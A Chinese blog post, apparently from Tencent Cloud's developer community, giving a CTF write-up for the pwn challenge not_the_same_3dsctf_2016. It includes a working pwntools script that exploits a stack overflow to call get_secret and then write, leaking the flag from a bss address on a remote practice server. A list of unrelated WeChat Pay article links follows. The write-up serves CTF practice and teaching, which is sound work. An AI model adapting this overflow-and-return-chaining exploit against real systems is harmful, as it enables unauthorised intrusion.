开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

社区首页 >专栏 >PWN not_the_same_3dsctf_2016 wp

PWN not_the_same_3dsctf_2016 wp

yulate

发布于 2023-05-02 03:10:11

发布于 2023-05-02 03:10:11

23000

代码可运行

举报

文章被收录于专栏：yulate的网络安全技术分析yulate的网络安全技术分析

运行总次数：0

代码可运行

本文最后更新于 556 天前，其中的信息可能已经有所发展或是发生改变。

这道题有两种解法，特地记录一下。

题目分析

先看保护，就只开了个NX保护

main函数很明显的栈溢出

字符串搜索出flag字段，点进去ctrl+x追踪过去

解题思路

思路一

这题在get_secret函数中通过fopen将flag的内容读入了unk_80CF91B中，我们通过查找可以在程序中发现write函数，通过write函数可以读取出bss字段中的flag。

payload

from pwn import * 
from LibcSearcher import *

content = 0
context.log_level = 'debug'

elf = ELF('./not_the_same_3dsctf_2016')

write_addr = elf.sym['write']
get_secret = elf.symbols['get_secret']
flag_bss = 0x080ECA2D  # flag在bss字段上的地址

def main():
    if content == 1:
        p = process('not_the_same_3dsctf_2016')
    else:
        p = remote('node4.buuoj.cn',29698)

    paylaod = b'a' * 0x2D + p32(get_secret) + p32(write_addr) + b'a'*4 +p32(1) + p32(flag_bss) + p32(45)
    p.sendline(paylaod)
    p.interactive()

main()

思路二

利用mprotect函数进行读取，具体看我的这篇文章：https://cloud.tencent.com/developer/article/2277508

浏览量: 268

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

原始发表：2021-10-17 ，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自作者个人站点/博客前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

评论

登录后参与评论

暂无评论

微信扫码支付(模式一)遇到的那些坑

微信云支付

在这个二维码风起云涌的时代，在线支付已经成为潮流，没事扫一扫，打赏一下我也不介意。 timg.jpg 酝酿谈坑之前先聊一聊模式一的大体流程，模式一的适用场景一般为自助售卖机或者固定价格的商品的线下交

小柒2012

2018/04/16

5K2

微信扫码支付(模式一)遇到的那些坑

微信h5支付，微信外浏览器支付实现

微信 https java api 官方文档

大家好，又见面了，我是你们的朋友全栈君。对接第三方比较重要的点都有什么？ 1.按规则 2.单独封装 3.做好出入参 2021-02-07修改看一下官方文档还是很必要的，知道必不可少的

全栈程序员站长

2022/08/18

1.8K0

微信h5支付，微信外浏览器支付实现

先说一个事情。8月1号开始微信公众平台支付的开发配置页面迁移至商户平台详细说明参考这个或者看下面的截图

Javen

2018/08/21

7.5K1

springboot集成微信支付V3（小程序）

微信小程序网站 https api

目前微信支付的 api 有 V2 和 V3 两个版本，V2 是 xml 的数据结构不建议用了，很麻烦（虽然 V3 也不简单）.

adu

2022/10/30

3.3K0

springboot集成微信支付V3（小程序）

H5微信支付、支付宝支付

微信 html php javascript 编程算法

1.绑定域名：登录微信公众平台 –> 公众号设置 –> 功能设置 –> 填写“JS接口安全域名”

青梅煮码

2023/02/18

1.7K0

微信支付之微信小程序支付

微信 api 编程算法访问管理小程序

版权声明：本文为博主原创文章，未经博主允许不得转载。 https://blog.csdn.net/linzhiqiang0316/article/details/78956042

林老师带你学编程

2019/05/26

5.1K0

微信小程序调起H5页面支付的全流程解析与实战

腾讯技术创作特训营S11#重启人生

咦咦咦，各位小可爱，我是你们的好伙伴——bug菌，今天又来给大家普及Java SE相关知识点了，别躲起来啊，听我讲干货还不快点赞，赞多了我就有动力讲得更嗨啦！所以呀，养成先点赞后阅读的好习惯，别被干货淹没了哦~

bug菌

2024/12/30

3K1

微信小程序调起H5页面支付的全流程解析与实战

微信JSAPI支付

微信访问管理数据库 sql api

1.和H5、Native扫码支付略微有点不同，JSAPI主要适用于微信内支付的场景，就是在微信内置浏览器中实现的H5支付

安德玛

2022/03/05

2.4K0

JAVA后端实现统一扫码支付：微信篇

微信访问管理网站编程算法 json

1.判断支付平台，在判断是微信平台时，必须使用window.location打开网页，使用其他方法在IOS版微信无法打开网页，至少现在的新版微信无法打开。对应的连接是请求获取code的链接。第2步会讲到。

Java编程指南

2019/08/02

1.2K0

JAVAWEB开发的微信公众号H5支付

微信云支付 php

一切需求都是来源于业务需要，前一阵子做了微信扫码支付，的确相对PC用户来说方便了很多。但是如果手机下单，你总不能让用户自己扫自己吧？查看了一下文档，微信还是支持公众号内网页端调起支付(前提你必须有微信

小柒2012

2018/04/13

3.2K0

JAVAWEB开发的微信公众号H5支付

微信支付之扫码、APP、小程序支付接入详解

微信小程序网站 api java

做电商平台的小伙伴都知道，支付服务是必不可少的一部分，今天我们开始就说说支付服务的接入及实现。目前在国内，几乎90%中小公司的支付系统都离不开微信支付和支付宝支付。那么大家要思考了，为什么微信支付和支付宝支付能作为大多数公司接入的首选呢？其实这个问题大多小伙伴应该是很清楚的，说白了就是人家有庞大的用户流量，目前微信在国内的用户已突破10亿，支付宝也接近8亿左右，如此庞大的用户群体，你还会选择其他的第三方支付（微博钱包、财付通、快钱等）吗，作为普通客户，大家都希望能方便快捷，谁会为了在一个平台买点东西下载或开通其他服务呢，除非你给他有诱惑性的好处。今天我们先说说微信支付的接入及实现。

攻城狮的那点事

2019/08/26

2.1K0

微信支付之扫码、APP、小程序支付接入详解

微信公众号H5支付遇到的那些坑

微信微服务 spring boot

简史官方文档说的很清楚，商户已有H5商城网站，用户通过消息或扫描二维码在微信内打开网页时，可以调用微信支付完成下单购买的流程。当然，最近微信支付平台也加入了纯H5支付，也就是说用户可以在微信以外的手机浏览器请求微信支付的场景唤起微信支付。当然，今天的主角是微信公众号支付，其实也不一定非在公众号中打开，只要在微信中打开就可以使用。实现项目使用的springboot微服务来实现，以下都是简单的伪代码实现，具体逻辑见码云。 Main 其实就是一个初始化下单操作，前台业务逻辑在这就不展示了，这个就是接收

小柒2012

2018/04/16

5.5K3

【愚公系列】2022年10月微信小程序-电商项目-微信支付后端功能实现（node版）

javascript node.js 微信小程序编程算法

微信支付是腾讯集团旗下的第三方支付平台，致力于为用户和企业提供安全、便捷、专业的在线支付服务。以“微信支付，不止支付”为核心理念，为个人用户创造了多种便民服务和应用场景。微信支付为各类企业以及小微商户提供专业的收款能力，运营能力，资金结算解决方案，以及安全保障。用户可以使用微信支付来购物、吃饭、旅游、就医、交水电费等。企业、商品、门店、用户已经通过微信连在了一起，让智慧生活，变成了现实。

愚公搬代码

2022/10/31

9730

【愚公系列】2022年10月微信小程序-电商项目-微信支付后端功能实现（node版）

〔支付接入〕微信的 h5 支付和 jsapi 支付

微信支付微信云支付

江户川码农

2023/08/10

2.2K0

〔支付接入〕微信的 h5 支付和 jsapi 支付

金融项目-微信支付-思路

金融微信后台前端微信支付

公众号接入支付： https://pay.weixin.qq.com/static/applyment_guide/applyment_detail_public.shtml

张哥编程

2024/12/07

2410

手把手教你springboot集成微信支付

微信小程序 https 官方文档 api

最近要做一个微信小程序，需要微信支付，所以研究了下怎么在 java 上集成微信支付功能，特此记录下。

用户2038589

2022/09/21

2.2K0

实战：第八章：支付宝Native,JSAPI支付与微信Native,JSAPI,MWEB支付实现

以上三种支付方式都是需要和前端交互的网页类支付接口然后看看H5的配置类：\

Java廖志伟

2022/09/28

7560

一文快速实现微信公众号支付功能（详细版，建议收藏备用）

微信支付实际上有很多种不同的类型，具体要使用哪一种就需要根据不同的应用场景来选择，官方给出的参考例子：刷卡支付：用户打开微信钱包的刷卡的界面，商户扫码后提交完成支付。公众号支付：用户在微信内进入商家H5页面，页面内调用JSSDK完成支付扫码支付：用户打开"微信扫一扫“，扫描商户的二维码后完成支付 APP支付：商户APP中集成微信SDK，用户点击后跳转到微信内完成支付 H5支付：用户在微信以外的手机浏览器请求微信支付的场景唤起微信支付小程序支付：用户在微信小程序中使用微信支付的场景

java进阶架构师

2019/01/02

6K0

实习生妹子问我怎么对接微信支付(H5、JSAPI、小程序)

编程算法官方文档微信小程序 html5

开通微信商户号、微信公众号然后按照步骤准备一堆资料审核，然后设置相关配置。所以最好提前准备资料审核以免耽误开发进度。配置的步骤：官方文档，直接按照官方文档配置就行了。需要特别注意的是配置商户号的支付授权目录和公众号的授权域名必须一致，不然会调起支付失败的！

andyhu

2022/12/14

1.2K0

微信 html5 https api 网络安全

微信支付分很多种，其中微信H5支付是给在手机浏览器上使用，在手机上发起付款，自动跳转到微信并付款

二十三年蝉

2022/03/10

1.4K0

相关推荐

微信扫码支付(模式一)遇到的那些坑

更多 >

LV.3

腾讯高级后台工程师

作者相关精选

换一批

目录

题目分析

解题思路
- 思路一
  - payload
- 思路二

加入讨论

的问答专区 >

架构师之路0

1技术VP擅长5个领域

相关课程

一站式学习中心 >

微信公众号在线学习平台搭建实践_《硅谷课堂》

微信小程序学习路径课

云开发 CloudBase

小程序·云开发

微信小程序

本文部分代码块支持一键运行，欢迎体验

本文部分代码块支持一键运行，欢迎体验